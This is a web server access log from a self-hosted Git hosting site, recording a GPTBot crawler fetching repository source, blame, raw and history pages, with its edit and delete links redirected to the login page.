"/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11343] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:12:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js" +[17/Feb/2026:17:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/js/script.js" +[17/Feb/2026:17:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js" +[17/Feb/2026:17:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js" +[17/Feb/2026:17:12:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:17:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:17:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 15253] [Gzip 7.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js" +[17/Feb/2026:17:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 9851] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js" +[17/Feb/2026:17:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 29445] [Gzip 11.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:17:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 20912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:17:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 9850] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:17:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 938] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:17:12:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:12:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11541] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" +[17/Feb/2026:17:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 29497] [Gzip 8.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:17:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72901] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" +[17/Feb/2026:17:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11337] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" +[17/Feb/2026:17:12:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/assets/js/script.js" +[17/Feb/2026:17:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/assets/js/script.js" +[17/Feb/2026:17:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html?display=source" [Client 74.7.227.38] [Length 526179] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:17:12:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:17:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:17:12:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:17:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:17:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 554560] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:17:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 554517] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:17:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 554561] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:17:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:12:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:17:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:17:12:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:17:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:17:12:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:17:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:17:12:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:17:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:17:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 9859] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:17:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 35308] [Gzip 14.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:17:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 997] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:17:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:17:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 9896] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:17:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 845947] [Gzip 27.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:17:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 9926] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:17:12:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 845918] [Gzip 27.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:17:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 845949] [Gzip 27.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:17:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 204277] [Gzip 14.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:17:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 1912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:17:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10429] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:17:13:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:17:13:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:17:13:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:17:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:17:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 139339] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:17:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 958759] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" 